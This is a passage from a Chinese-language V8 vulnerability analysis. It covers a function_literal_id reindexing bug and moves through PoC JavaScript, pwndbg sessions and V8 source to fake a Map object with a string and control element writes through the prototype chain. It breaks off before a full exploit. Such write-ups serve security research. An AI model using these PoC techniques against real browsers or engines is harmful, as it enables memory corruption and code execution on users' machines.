118 RECURSE(Visit(stmt));
► 119 if (stmt->IsJump()) break;
120 }
121 }
pwndbg> p stmt->Print()
IF at 71
. CONDITION at 75
. . VAR PROXY unresolved "a"
. THEN at -1
. . BLOCK at -1
. . . RETURN at 89
. . . . LITERAL undefined
. ELSE at -1
. . BLOCK at -1
. . . RETURN at 121
. . . . LITERAL undefined
$8 = void
此时遍历到了那个if语句,判断为IsJump,则后面的内容不再遍历。然后返回到这里更正function_literal_id
23 void AstFunctionLiteralIdReindexer::VisitFunctionLiteral(FunctionLiteral* lit) {
24 AstTraversalVisitor::VisitFunctionLiteral(lit);
► 25 lit->set_function_literal_id(lit->function_literal_id() + delta_);
26 }
pwndbg> p lit->function_literal_id()
$9 = 5
pwndbg> p delta_
$10 = -3
可见,这里只更正了f的index为2,而v1、f1、f2的index都还没更新,导致fun->function_literal_id()
会比函数个数还大。现在来研究一下function_literal_id会对编译造成什么影响。
在FinalizeUnoptimizedCode
阶段,即字节码的最后阶段,有如下代码
// Finalize the inner functions' compilation jobs.
for (auto&& inner_job : *inner_function_jobs) {
Handle<SharedFunctionInfo> inner_shared_info =
Compiler::GetSharedFunctionInfo(
inner_job->compilation_info()->literal(), parse_info->script(),
isolate);
// The inner function might be compiled already if compiling for debug.
if (inner_shared_info->is_compiled()) continue;
if (FinalizeUnoptimizedCompilationJob(inner_job.get(), inner_shared_info,
isolate) !=
CompilationJob::SUCCEEDED) {
return false;
}
}
这里根据inner_job->compilation_info()->literal()
取到了内部函数的FunctionLiteral
对象,但记住因为漏洞的原因,它的literal_id没有更新,仍然为解析时的那个顺序,其中(function() { print("f2") });
的literal_id为7。显然,我们的字节码并没有7段,那么我们多增加几个函数
function fun() {
var f = (v1 = (function() {
var a = 0;
if (a) {
return;
} else {
return;
}
(function() {
print("f1");
});
(function() {
print("f2")
});
}))=>{};
f();
}
function fun2() {
fun();
}
function fun3() {
fun();
}
fun2();
fun3();
下标7的位置函数正好是fun3函数
[generated bytecode for function: ]
............
[generated bytecode for function: fun2]
............
[generated bytecode for function: fun]
...........
[generated bytecode for function: f]
...........
[generated bytecode for function: v1]
...........
[generated bytecode for function: ]
...........
[generated bytecode for function: ]
..........
[generated bytecode for function: fun3]
这意味着取到的inner_shared_info
将会是fun3的shared_info
,而这里处理的函数实际上是(function() { print("f2") });
那么执行FinalizeUnoptimizedCompilationJob时
CompilationJob::Status FinalizeUnoptimizedCompilationJob(
UnoptimizedCompilationJob* job, Handle<SharedFunctionInfo> shared_info,
Isolate* isolate) {
UnoptimizedCompilationInfo* compilation_info = job->compilation_info();
ParseInfo* parse_info = job->parse_info();
SetSharedFunctionFlagsFromLiteral(compilation_info->literal(), shared_info);
CompilationJob::Status status = job->FinalizeJob(shared_info, isolate);
if (status == CompilationJob::SUCCEEDED) {
InstallUnoptimizedCode(compilation_info, shared_info, parse_info, isolate);
CodeEventListener::LogEventsAndTags log_tag;
if (parse_info->is_toplevel()) {
log_tag = compilation_info->is_eval() ? CodeEventListener::EVAL_TAG
: CodeEventListener::SCRIPT_TAG;
} else {
log_tag = parse_info->lazy_compile() ? CodeEventListener::LAZY_COMPILE_TAG
: CodeEventListener::FUNCTION_TAG;
}
job->RecordFunctionCompilation(log_tag, shared_info, isolate);
job->RecordCompilationStats(isolate);
}
return status;
}
其中的InstallUnoptimizedCode
会将(function() { print("f2") });
的字节码绑定到fun3函数对象上,也就是调用fun3时会调用(function() { print("f2") });
这说明这个漏洞导致了函数错位。除此之外还有什么影响呢?
这将导致(function() { print("f2") });
函数使用的context将会是fun3的context。
使用如下代码测试
function fun() {
var f = (v1 = (function() {
var a = 0;
if (a) {
return;
} else {
return;
}
(function() {
print("f1");
});
(function() {
print("f2");
a = "a".repeat(100);
});
}))=>{};
f();
}
let arr = [1.1,2.2,3.3];
function fun2() {
fun();
}
function fun3() {
fun();
}
fun2();
%DebugPrint(fun);
%SystemBreak();
fun3();
其中f2的字节码如下
Frame size 24
204 E> 0x21f372c1f542 @ 0 : a5 StackCheck
218 S> 0x21f372c1f543 @ 1 : 13 00 00 LdaGlobal [0], [0]
0x21f372c1f546 @ 4 : 26 fb Star r0
0x21f372c1f548 @ 6 : 12 01 LdaConstant [1]
0x21f372c1f54a @ 8 : 26 fa Star r1
218 E> 0x21f372c1f54c @ 10 : 5d fb fa 02 CallUndefinedReceiver1 r0, r1, [2]
240 S> 0x21f372c1f550 @ 14 : 12 02 LdaConstant [2]
0x21f372c1f552 @ 16 : 26 fa Star r1
248 E> 0x21f372c1f554 @ 18 : 28 fa 03 04 LdaNamedProperty r1, [3], [4]
0x21f372c1f558 @ 22 : 26 fb Star r0
0x21f372c1f55a @ 24 : 0c 64 LdaSmi [100]
0x21f372c1f55c @ 26 : 26 f9 Star r2
248 E> 0x21f372c1f55e @ 28 : 59 fb fa f9 06 CallProperty1 r0, r1, r2, [6]
242 E> 0x21f372c1f563 @ 33 : 1d 04 StaCurrentContextSlot [4]
0x21f372c1f565 @ 35 : 0d LdaUndefined
267 S> 0x21f372c1f566 @ 36 : a9 Return
Constant pool (size = 4)
我们在StaCurrentContextSlot
字节码断点,因为这里会向context的第4个插槽写数据,也就是说这里在修改fun3的context内容。
0x7f4a3b433925 <Builtins_StaCurrentContextSlotHandler+37> movabs r10, 0x100000000
0x7f4a3b43392f <Builtins_StaCurrentContextSlotHandler+47> cmp r10, rdx
0x7f4a3b433932 <Builtins_StaCurrentContextSlotHandler+50> jae Builtins_StaCurrentContextSlotHandler+65 <Builtins_StaCurrentContextSlotHandler+65>
↓
0x7f4a3b433941 <Builtins_StaCurrentContextSlotHandler+65> mov rbx, qword ptr [rbx - 8]
0x7f4a3b433945 <Builtins_StaCurrentContextSlotHandler+69> lea rdx, [rdx*8 + 0xf]
► 0x7f4a3b43394d <Builtins_StaCurrentContextSlotHandler+77> mov qword ptr [rbx + rdx], rax
0x7f4a3b433951 <Builtins_StaCurrentContextSlotHandler+81> mov rsi, -0x80000
pwndbg> job $rbx
0x21f372c1ed09: [Context] in OldSpace
- map: 0x0cfeb6b81049 <Map>
- length: 5
- scope_info: 0x21f372c1e8a1 <ScopeInfo SCRIPT_SCOPE [9]>
- previous: 0x21f372c01749 <NativeContext[247]>
- extension: 0x0cfeb6b805b1 <the_hole>
- native_context: 0x21f372c01749 <NativeContext[247]>
0: 0x21f372c1e8a1 <ScopeInfo SCRIPT_SCOPE [9]>
1: 0x21f372c01749 <NativeContext[247]>
2: 0x0cfeb6b805b1 <the_hole>
3: 0x21f372c01749 <NativeContext[247]>
4: 0x37962980c941 <JSArray[3]>
pwndbg> job 0x37962980c941
0x37962980c941: [JSArray]
- map: 0x078e20f82de9 <Map(PACKED_DOUBLE_ELEMENTS)> [FastProperties]
- prototype: 0x21f372c10c89 <JSArray[0]>
- elements: 0x37962980c919 <FixedDoubleArray[3]> [PACKED_DOUBLE_ELEMENTS]
- length: 3
- properties: 0x0cfeb6b80c21 <FixedArray[0]> {
#length: 0x198440c801a9 <AccessorInfo> (const accessor descriptor)
}
- elements: 0x37962980c919 <FixedDoubleArray[3]> {
0: 1.1
1: 2.2
2: 3.3
}
.............................................
0x7f4a3b43394d <Builtins_StaCurrentContextSlotHandler+77> mov qword ptr [rbx + rdx], rax
► 0x7f4a3b433951 <Builtins_StaCurrentContextSlotHandler+81> mov rsi, -0x80000
pwndbg> job $rbx
0x21f372c1ed09: [Context] in OldSpace
- map: 0x0cfeb6b81049 <Map>
- length: 5
- scope_info: 0x21f372c1e8a1 <ScopeInfo SCRIPT_SCOPE [9]>
- previous: 0x21f372c01749 <NativeContext[247]>
- extension: 0x0cfeb6b805b1 <the_hole>
- native_context: 0x21f372c01749 <NativeContext[247]>
0: 0x21f372c1e8a1 <ScopeInfo SCRIPT_SCOPE [9]>
1: 0x21f372c01749 <NativeContext[247]>
2: 0x0cfeb6b805b1 <the_hole>
3: 0x21f372c01749 <NativeContext[247]>
4: 0x37962980caa1 <String[100]: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa>
可见,这里可以修改内存里的数据,并且没有边界检查,并且我们发现在Context的第4个插槽后方正好就是fun对象
pwndbg> x /100gx 0x21f372c1ed08
0x21f372c1ed08: 0x00000cfeb6b81049 0x0000000500000000
0x21f372c1ed18: 0x000021f372c1e8a1 0x000021f372c01749
0x21f372c1ed28: 0x00000cfeb6b805b1 0x000021f372c01749
0x21f372c1ed38: 0x000037962980caa1 0x0000078e20f803b9
pwndbg> job 0x21f372c1ed41
0x21f372c1ed41: [Function] in OldSpace
- map: 0x078e20f803b9 <Map(HOLEY_ELEMENTS)> [FastProperties]
- prototype: 0x21f372c01ff1 <JSFunction (sfi = 0x198440c88009)>
- elements: 0x0cfeb6b80c21 <FixedArray[0]> [HOLEY_ELEMENTS]
- function prototype:
- initial_map:
- shared_info: 0x21f372c1e9a1 <SharedFunctionInfo fun>
- name: 0x21f372c1e7b9 <String[#3]: fun>
那么,我们可以在f函数里增加几个变量,就可以覆盖fun对象的MAP
。
function fun() {
var f = (v1 = (function() {
let a = 0;
let b = 0;
if (a) {
return;
} else {
return;
}
(function() {
print("f1");
});
(function() {
print("f2");
//修改arr指针为a
a = [1.1,2.2,3.3];
//修改fun的MAP为b
b = "a".repeat(10);
});
}))=>{};
f();
}
let arr = {};
function fun2() {
fun();
}
function fun3() {
fun();
}
fun2();
//%DebugPrint(fun);
//%SystemBreak();
fun3();
fun[0x66] = 0x123;
运行后发现崩溃
root@ubuntu:~/Desktop/v8/out.gn/x64.debug.bug# ./d8 poc.js
f2
abort: CSA_ASSERT failed: IsMap(map) [../../src/code-stub-assembler.cc:5929]
显然是因为我们覆盖了fun函数对象的MAP为b对象的地址,导致Debug版本中的断言(CSA_ASSERT,与DCHECK类似)检查不通过。但在Release版本里是没有这类检查的,运行后发现无报错崩溃,那么最后一句fun[0x66] = 0x123发生了什么,0x123被写入到哪了?
KeyedStoreIC
V8中使用StaKeyedProperty
字节码处理下标赋值的操作,该字节码首先会调用Builtins_KeyedStoreIC
函数
void AccessorAssembler::KeyedStoreIC(const StoreICParameters* p) {
.....................................
Node* receiver_map = LoadReceiverMap(p->receiver);
GotoIf(IsDeprecatedMap(receiver_map), &miss);
.....................................
BIND(&miss);
{
Comment("KeyedStoreIC_miss");
TailCallRuntime(Runtime::kKeyedStoreIC_Miss, p->context, p->value, p->slot,
p->vector, p->receiver, p->name);
}
}
由于这里receiver_map
直接取到的就是我们在fun函数中创建的b字符串对象,而对象地址是具有随机性的,因此有很大的几率到达miss标签,这里是处理IC缓存缺失的情况,调用慢方法KeyedStoreIC_Miss
。KeyedStoreIC_Miss
的调用链为KeyedStoreIC_Miss
->KeyedStoreIC::Store
->Runtime::SetObjectProperty
。其中Runtime::SetObjectProperty
源码如下
MaybeHandle<Object> Runtime::SetObjectProperty(
Isolate* isolate, Handle<Object> object, Handle<Object> key,
Handle<Object> value, StoreOrigin store_origin,
Maybe<ShouldThrow> should_throw) {
......................
// Check if the given key is an array index.
bool success = false;
LookupIterator it =
LookupIterator::PropertyOrElement(isolate, object, key, &success);
if (!success) return MaybeHandle<Object>();
if (!it.IsFound() && key->IsSymbol() &&
Symbol::cast(*key)->is_private_name()) {
Handle<Object> name_string(Symbol::cast(*key)->name(), isolate);
DCHECK(name_string->IsString());
THROW_NEW_ERROR(isolate,
NewTypeError(MessageTemplate::kInvalidPrivateFieldWrite,
name_string, object),
Object);
}
MAYBE_RETURN_NULL(
Object::SetProperty(&it, value, store_origin, should_throw));
return value;
}
该函数调用LookupIterator::PropertyOrElement
函数,这个函数的作用是根据key,从对象的prototype链中寻找合适的holder
(即寻找与这个key匹配的数组,这样后面可以将数据存入对应的数组),具体过程如下
LookupIterator LookupIterator::PropertyOrElement(
Isolate* isolate, Handle<Object> receiver, Handle<Name> name,
Configuration configuration) {
uint32_t index;
if (name->AsArrayIndex(&index)) {
LookupIterator it = LookupIterator(isolate, receiver, index, configuration);
it.name_ = name;
return it;
}
return LookupIterator(isolate, receiver, name, configuration);
}
调试运行
57 uint32_t index = 0;
58 if (key->ToArrayIndex(&index)) {
59 *success = true;
► 60 return LookupIterator(isolate, receiver, index, configuration);
61 }
pwndbg> p/x index
$137 = 0x66
可以知道它会继续调用LookupIterator
,跟进去
LookupIterator::LookupIterator(Isolate* isolate, Handle<Object> receiver,
uint32_t index, Configuration configuration)
: LookupIterator(isolate, receiver, index,
GetRoot(isolate, receiver, index), configuration) {}
这里会调用GetRoot
Handle<JSReceiver> LookupIterator::GetRoot(Isolate* isolate,
Handle<Object> receiver,
uint32_t index) {
if (receiver->IsJSReceiver()) return Handle<JSReceiver>::cast(receiver);
return GetRootForNonJSReceiver(isolate, receiver, index);
}
如果满足条件receiver->IsJSReceiver()
,则直接返回原对象,否则会进入GetRootForNonJSReceiver,其中可能通过NewJSObject创建一个新的包装对象,显然这不是我们想要的
Handle<JSReceiver> LookupIterator::GetRootForNonJSReceiver(
Isolate* isolate, Handle<Object> receiver, uint32_t index) {
// Strings are the only objects with properties (only elements) directly on
// the wrapper. Hence we can skip generating the wrapper for all other cases.
if (index != kMaxUInt32 && receiver->IsString() &&
index < static_cast<uint32_t>(String::cast(*receiver)->length())) {
// TODO(verwaest): Speed this up. Perhaps use a cached wrapper on the native
// context, ensuring that we don't leak it into JS?
Handle<JSFunction> constructor = isolate->string_function();
Handle<JSObject> result = isolate->factory()->NewJSObject(constructor);
Handle<JSValue>::cast(result)->set_value(*receiver);
return result;
}
auto root =
handle(receiver->GetPrototypeChainRootMap(isolate)->prototype(), isolate);
if (root->IsNull(isolate)) {
isolate->PushStackTraceAndDie(reinterpret_cast<void*>(receiver->ptr()));
}
return Handle<JSReceiver>::cast(root);
}
因为我们希望能够通过已有的数据构造出一个Prototype链,而不是创建一个新的。那么receiver->IsJSReceiver()
是怎么判断的呢?最终会调用到IsJSReceiver(InstanceType instance_type)
V8_INLINE bool IsJSReceiver(InstanceType instance_type) {
STATIC_ASSERT(LAST_TYPE == LAST_JS_RECEIVER_TYPE);
return instance_type >= FIRST_JS_RECEIVER_TYPE;
}
.................
FIRST_JS_RECEIVER_TYPE = JS_PROXY_TYPE,
........
JS_PROXY_TYPE = 0x0400, // FIRST_JS_RECEIVER_TYPE
JS_GLOBAL_OBJECT_TYPE, // FIRST_JS_OBJECT_TYPE
JS_GLOBAL_PROXY_TYPE,
JS_MODULE_NAMESPACE_TYPE,
// Like JS_API_OBJECT_TYPE, but requires access checks and/or has
// interceptors.
JS_SPECIAL_API_OBJECT_TYPE = 0x0410, // LAST_SPECIAL_RECEIVER_TYPE
这个TYPE实际上就是MAP对象中偏移0xc处的一个数据,我们可以使用如下代码调试观察
var a = new Proxy({},{});
%DebugPrint(a);
%SystemBreak();
pwndbg> job 0x05fe41603e79
0x5fe41603e79: [Map]
- type: JS_PROXY_TYPE
pwndbg> x /20wx 0x05fe41603e78
0x5fe41603e78: 0xd2c80189 0x0000207f 0x2e000004 0x19000400
那么现在,由于string对象成为了MAP,那么为了绕过这里的坎,我们要保证&string+0xc处的short数据>=0x400,我们使用如下代码进行调试观察一下string的结构
var a = 'a'.repeat(0x400);
var b = [a];
%DebugPrint(b);
%SystemBreak();
..............................
- elements: 0x26799f98c839 <FixedArray[1]> {
0: 0x26799f98c819 <String[1024]: aaaa......
.............................
可以知道string对象地址为0x26799f98c819
,我们查看数据
pwndbg> x /20wx 0x26799f98c818
0x26799f98c818: 0xb5e81e59 0x00002de1 0x00000003 0x00000400
可以发现,在0xc的位置正好是字符串长度,因此,我们可以通过控制字符串长度来伪造MAP结构中的TYPE。于是,我们将POC代码改为如下
.....................
print("f2");
//修改arr指针为a
a = [1.1,2.2,3.3];
//修改fun的MAP为b
b = "a".repeat(0x400);
.............
然后进行调试
155 Handle<JSReceiver> LookupIterator::GetRoot(Isolate* isolate,
156 Handle<Object> receiver,
157 uint32_t index) {
► 158 if (receiver->IsJSReceiver()) return Handle<JSReceiver>::cast(receiver);
159 return GetRootForNonJSReceiver(isolate, receiver, index);
160 }
pwndbg> p receiver->IsJSReceiver()
$138 = true
这次满足要求,便可以直接返回。接下来进入LookupIterator
的构造函数
In file: /home/sea/Desktop/v8/src/lookup.h
71 initial_holder_(holder),
72 index_(index),
73 number_(static_cast<uint32_t>(DescriptorArray::kNotFound)) {
74 // kMaxUInt32 isn't a valid index.
75 DCHECK_NE(kMaxUInt32, index_);
► 76 Start<true>();
77 }
Start函数调用LookupInHolder
函数
In file: /home/sea/Desktop/v8/src/lookup.cc
151 holder_ = initial_holder_;
152
153 JSReceiver holder = *holder_;
154 Map map = holder->map();
155
► 156 state_ = LookupInHolder<is_element>(map, holder);
我们继续跟进
220 inline State LookupInHolder(Map map, JSReceiver holder) {
► 221 return map->IsSpecialReceiverMap()
222 ? LookupInSpecialHolder<is_element>(map, holder)
223 : LookupInRegularHolder<is_element>(map, holder);
224 }
pwndbg> p map->IsSpecialReceiverMap()
$139 = true
这里会判断SpecialReceiverMap
,其判断的逻辑为
inline bool IsSpecialReceiverInstanceType(InstanceType instance_type) {
return instance_type <= LAST_SPECIAL_RECEIVER_TYPE;
}
// This should be in objects/map-inl.h, but can't, because of a cyclic
// dependency.
bool Map::IsSpecialReceiverMap() const {
bool result = IsSpecialReceiverInstanceType(instance_type());
DCHECK_IMPLIES(!result,
!has_named_interceptor() && !is_access_check_needed());
return result;
}
...............
// Boundary for testing JSReceivers that need special property lookup handling
LAST_SPECIAL_RECEIVER_TYPE = JS_SPECIAL_API_OBJECT_TYPE,
JS_SPECIAL_API_OBJECT_TYPE = 0x0410, // LAST_SPECIAL_RECEIVER_TYPE
可见这里也是根据MAP中的TYPE
ID来进行判断的,因此也是可以被我们控制。IsSpecialReceiverMap()为true后,会调用LookupInSpecialHolder
函数
template <bool is_element>
LookupIterator::State LookupIterator::LookupInSpecialHolder(
Map const map, JSReceiver const holder) {
STATIC_ASSERT(INTERCEPTOR == BEFORE_PROPERTY);
switch (state_) {
case NOT_FOUND:
if (map->IsJSProxyMap()) {
if (is_element || !name_->IsPrivate()) return JSPROXY;
}
if (map->is_access_check_needed()) {
if (is_element || !name_->IsPrivate()) return ACCESS_CHECK;
}
V8_FALLTHROUGH;
case ACCESS_CHECK:
if (check_interceptor() && HasInterceptor<is_element>(map) &&
!SkipInterceptor<is_element>(JSObject::cast(holder))) {
if (is_element || !name_->IsPrivate()) return INTERCEPTOR;
}
V8_FALLTHROUGH;
case INTERCEPTOR:
if (!is_element && map->IsJSGlobalObjectMap()) {
GlobalDictionary dict =
JSGlobalObject::cast(holder)->global_dictionary();
int number = dict->FindEntry(isolate(), name_);
if (number == GlobalDictionary::kNotFound) return NOT_FOUND;
number_ = static_cast<uint32_t>(number);
PropertyCell cell = dict->CellAt(number_);
if (cell->value()->IsTheHole(isolate_)) return NOT_FOUND;
property_details_ = cell->property_details();
has_property_ = true;
switch (property_details_.kind()) {
case v8::internal::kData:
return DATA;
case v8::internal::kAccessor:
return ACCESSOR;
}
}
.......................................
由于我们的TYPE
ID伪造为0x400,因此map->IsJSProxyMap()
返回true,导致LookupInSpecialHolder
返回的类型为JSPROXY
,这不是我们希望的,我们希望能返回DATA,因为这种类型能被我们进行读写,而PROXY不行。最终导致脚本运行结果如下
./b.js:41: TypeError: Cannot perform 'set' on a proxy that has been revoked
fun[0x66] = 0x123;
^
TypeError: Cannot perform 'set' on a proxy that has been revoked
at ./b.js:41:11
那么,我们将TYPE ID增大,POC中代码修改为
.....................
print("f2");
//修改arr指针为a
a = [1.1,2.2,3.3];
//修改fun的MAP为b
b = "a".repeat(0x800);
.............
于是,这回我们将进入LookupInRegularHolder
函数
220 inline State LookupInHolder(Map map, JSReceiver holder) {
221 return map->IsSpecialReceiverMap()
222 ? LookupInSpecialHolder<is_element>(map, holder)
► 223 : LookupInRegularHolder<is_element>(map, holder);
224 }
其代码如下
template <bool is_element>
LookupIterator::State LookupIterator::LookupInRegularHolder(
Map const map, JSReceiver const holder) {
DisallowHeapAllocation no_gc;
if (interceptor_state_ == InterceptorState::kProcessNonMasking) {
return NOT_FOUND;
}
if (is_element) {
JSObject js_object = JSObject::cast(holder);
ElementsAccessor* accessor = js_object->GetElementsAccessor();
FixedArrayBase backing_store = js_object->elements();
number_ =
accessor->GetEntryForIndex(isolate_, js_object, backing_store, index_);
if (number_ == kMaxUInt32) {
return holder->IsJSTypedArray() ? INTEGER_INDEXED_EXOTIC : NOT_FOUND;
}
property_details_ = accessor->GetDetails(js_object, number_);
} else if (!map->is_dictionary_map()) {
..................................
}
has_property_ = true;
switch (property_details_.kind()) {
case v8::internal::kData:
return DATA;
case v8::internal::kAccessor:
return ACCESSOR;
}
UNREACHABLE();
}
由于这里是按下标(index)访问,模板参数is_element
为true(前面调用的是Start<true>()),因此将进入is_element
分支
1159 if (is_element) {
1160 JSObject js_object = JSObject::cast(holder);
1161 ElementsAccessor* accessor = js_object->GetElementsAccessor();
1162 FixedArrayBase backing_store = js_object->elements();
► 1163 number_ =
1164 accessor->GetEntryForIndex(isolate_, js_object, backing_store, index_);
1165 if (number_ == kMaxUInt32) {
1166 return holder->IsJSTypedArray() ? INTEGER_INDEXED_EXOTIC : NOT_FOUND;
1167 }
pwndbg> p/x js_object->ptr_
$145 = 0x61f6349ed01
pwndbg> p/x backing_store->ptr_
$147 = 0x317690b80c21
pwndbg> x /20gx 0x61f6349ed00
0x61f6349ed00: 0x00002deae918ce19 0x0000317690b80c21
0x61f6349ed10: 0x0000317690b80c21 0x0000061f6349e999
0x61f6349ed20: 0x0000061f6349ecc9 0x0000061f6349ec89
pwndbg> job 0x317690b80c21
0x317690b80c21: [FixedArray]
- map: 0x317690b807b1 <Map>
- length: 0
可以知道,当前操作对象就是fun函数对象,取出了对象默认的elements(),然后调用GetEntryForIndex
函数
static uint32_t GetEntryForIndexImpl(Isolate* isolate, JSObject holder,
FixedArrayBase backing_store,
uint32_t index, PropertyFilter filter) {
DCHECK(IsFastElementsKind(kind()));
uint32_t length = Subclass::GetMaxIndex(holder, backing_store);
if (IsHoleyElementsKind(kind())) {
return index < length &&
!BackingStore::cast(backing_store)
->is_the_hole(isolate, index)
? index
: kMaxUInt32;
} else {
return index < length ? index : kMaxUInt32;
}
}
该函数用于检查index是否与当前的这个elements匹配,即index在length范围内的话,就能与当前的elements匹配成功。显然这里elements的length为0,而index为0x66,匹配失败,返回NOT_FOUND
1163 number_ =
1164 accessor->GetEntryForIndex(isolate_, js_object, backing_store, index_);
1165 if (number_ == kMaxUInt32) {
► 1166 return holder->IsJSTypedArray() ? INTEGER_INDEXED_EXOTIC : NOT_FOUND;
1167 }
于是,在LookupIterator::Start
中,函数将继续执行NextInternal<is_element>(map, holder);
开始遍历ProtoType链
157 if (IsFound()) return;
158
► 159 NextInternal<is_element>(map, holder);
160 }
遍历的逻辑如下
template <bool is_element>
void LookupIterator::NextInternal(Map map, JSReceiver holder) {
do {
JSReceiver maybe_holder = NextHolder(map);
if (maybe_holder.is_null()) {
if (interceptor_state_ == InterceptorState::kSkipNonMasking) {
RestartLookupForNonMaskingInterceptors<is_element>();
return;
}
state_ = NOT_FOUND;
if (holder != *holder_) holder_ = handle(holder, isolate_);
return;
}
holder = maybe_holder;
map = holder->map();
state_ = LookupInHolder<is_element>(map, holder);
} while (!IsFound());
holder_ = handle(holder, isolate_);
}
其中NextHolder就是取出prototype对象,然后返回
JSReceiver LookupIterator::NextHolder(Map map) {
DisallowHeapAllocation no_gc;
if (map->prototype() == ReadOnlyRoots(heap()).null_value()) {
return JSReceiver();
}
if (!check_prototype_chain() && !map->has_hidden_prototype()) {
return JSReceiver();
}
return JSReceiver::cast(map->prototype());
}
调试如下
In file: /home/sea/Desktop/v8/src/lookup.cc
183
184 template <bool is_element>
185 void LookupIterator::NextInternal(Map map, JSReceiver holder) {
186 do {
187 JSReceiver maybe_holder = NextHolder(map);
► 188 if (maybe_holder.is_null()) {
189 if (interceptor_state_ == InterceptorState::kSkipNonMasking) {
190 RestartLookupForNonMaskingInterceptors<is_element>();
pwndbg> p/x map->ptr_
$150 = 0x2deae918ce19
pwndbg> x /20gx 0x2deae918ce18
0x2deae918ce18: 0x0000317690b81e59 0x0000080000000003
0x2deae918ce28: 0x00002deae918cdf9 0x00002deae918cdf9
0x2deae918ce38: 0xdeadbeedbeadbeef 0xdeadbeedbeadbeef
pwndbg> p/x maybe_holder->ptr_
$152 = 0x2deae918cdf9
pwndbg> job 0x00002deae918cdf9
c"aaaaa..............
可以看到,这里取到了第四项(偏移0x18处,即MAP结构中prototype字段的位置)。由于MAP是我们用字符串对象伪造的,因此取到的prototype对象是字符串对象中的第四项,而此处正好也是一个字符串对象。
接下来调用LookupInHolder
对当前prototype进行判断,是否符合要求。
198 map = holder->map();
► 199 state_ = LookupInHolder<is_element>(map, holder);
200 } while (!IsFound());
pwndbg> job map->ptr_
0x317690b81e59: [Map]
- type: CONS_ONE_BYTE_STRING_TYPE
- instance size: 32
.......................
这次取到的MAP是字符串的MAP,会使用LookupInSpecialHolder
进行处理,在LookupInSpecialHolder中调用了LookupInRegularHolder
In file: /home/sea/Desktop/v8/src/lookup.cc
1134 return DATA;
1135 case v8::internal::kAccessor:
1136 return ACCESSOR;
1137 }
1138 }
► 1139 return LookupInRegularHolder<is_element>(map, holder);
主要逻辑仍然是将对应的elements取出来判断index是否在length范围内。
In file: /home/sea/Desktop/v8/src/lookup.cc
1160 JSObject js_object = JSObject::cast(holder);
1161 ElementsAccessor* accessor = js_object->GetElementsAccessor();
1162 FixedArrayBase backing_store = js_object->elements();
1163 number_ =
1164 accessor->GetEntryForIndex(isolate_, js_object, backing_store, index_);
► 1165 if (number_ == kMaxUInt32) {
1166 return holder->IsJSTypedArray() ? INTEGER_INDEXED_EXOTIC : NOT_FOUND;
1167 }
pwndbg> p/x js_object->ptr_
$157 = 0x2deae918cdf9
pwndbg> x /20gx 0x2deae918cdf8
0x2deae918cdf8: 0x0000317690b81e59 0x0000040000000003
0x2deae918ce08: 0x00002deae918cdd9 0x00002deae918cdd9
0x2deae918ce18: 0x0000317690b81e59 0x0000080000000003
0x2deae918ce28: 0x00002deae918cdf9 0x00002deae918cdf9
........
pwndbg> p/x backing_store->ptr_
$158 = 0x2deae918cdd9
pwndbg> x /20gx 0x2deae918cdd8
0x2deae918cdd8: 0x0000317690b81e59 0x0000020000000003
0x2deae918cde8: 0x00002deae918cdb9 0x00002deae918cdb9
0x2deae918cdf8: 0x0000317690b81e59 0x0000040000000003
0x2deae918ce08: 0x00002deae918cdd9 0x00002deae918cdd9
0x2deae918ce18: 0x0000317690b81e59 0x0000080000000003
0x2deae918ce28: 0x00002deae918cdf9 0x00002deae918cdf9
...........
pwndbg> p number_
$159 = 102
显然,这回条件是满足的,index在这个elements的length范围内,于是执行到后面,返回DATA
In file: /home/sea/Desktop/v8/src/lookup.cc
1181 property_details_ = dict->DetailsAt(number_);
1182 }
1183 has_property_ = true;
1184 switch (property_details_.kind()) {
1185 case v8::internal::kData:
► 1186 return DATA;
1187 case v8::internal::kAccessor:
1188 return ACCESSOR;
1189 }
这样LookupIterator it = LookupIterator::PropertyOrElement(isolate, object, key, &success);
从prototype链上成功找到了合适的elements对象,然后回到Runtime::SetObjectProperty
继续执行到这里
In file: /home/sea/Desktop/v8/src/runtime/runtime-object.cc
366 NewTypeError(MessageTemplate::kInvalidPrivateFieldWrite,
367 name_string, object),
368 Object);
369 }
370
► 371 MAYBE_RETURN_NULL(
372 Object::SetProperty(&it, value, store_origin, should_throw));
373
374 return value;
375 }
SetObjectProperty通过Object::SetProperty最终调用了SetPropertyInternal
,其代码如下
Maybe<bool> Object::SetPropertyInternal(LookupIterator* it,
Handle<Object> value,
Maybe<ShouldThrow> should_throw,
StoreOrigin store_origin, bool* found) {
it->UpdateProtector();
DCHECK(it->IsFound());
// Make sure that the top context does not change when doing callbacks or
// interceptor calls.
AssertNoContextChange ncc(it->isolate());
do {
switch (it->state()) {
case LookupIterator::NOT_FOUND:
UNREACHABLE();
......................
case LookupIterator::DATA:
if (it->IsReadOnly()) {
return WriteToReadOnlyProperty(it, value, should_throw);
}
if (it->HolderIsReceiverOrHiddenPrototype()) {
return SetDataProperty(it, value);
}
V8_FALLTHROUGH;
case LookupIterator::TRANSITION:
.................
}
it->Next();
} while (it->IsFound());
*found = false;
return Nothing<bool>();
}
首先得绕过it->IsReadOnly()
,其逻辑如下
bool IsReadOnly() const { return property_details().IsReadOnly(); }
bool IsReadOnly() const { return (attributes() & READ_ONLY) != 0; }
由于property_details_
是在LookupInRegularHolder
阶段创建的
template <bool is_element>
LookupIterator::State LookupIterator::LookupInRegularHolder(
Map const map, JSReceiver const holder) {
...........
if (is_element) {
.........
if (number_ == kMaxUInt32) {
return holder->IsJSTypedArray() ? INTEGER_INDEXED_EXOTIC : NOT_FOUND;
}
property_details_ = accessor->GetDetails(js_object, number_);
...............
而GetDetails函数如下
PropertyDetails GetDetails(JSObject holder, uint32_t entry) final {
return Subclass::GetDetailsImpl(holder, entry);
}
static PropertyDetails GetDetailsImpl(JSObject holder, uint32_t entry) {
return PropertyDetails(kData, NONE, PropertyCellType::kNoCell);
}
.............
PropertyDetails(PropertyKind kind, PropertyAttributes attributes,
PropertyCellType cell_type, int dictionary_index = 0) {
value_ = KindField::encode(kind) | LocationField::encode(kField) |
AttributesField::encode(attributes) |
DictionaryStorageField::encode(dictionary_index) |
PropertyCellTypeField::encode(cell_type);
}
因此attributes()
为0(即NONE),可以直接绕过it->IsReadOnly()
条件。那么现在,我们还得满足it->HolderIsReceiverOrHiddenPrototype()
条件,才能调用SetDataProperty
。
HolderIsReceiverOrHiddenPrototype函数代码如下
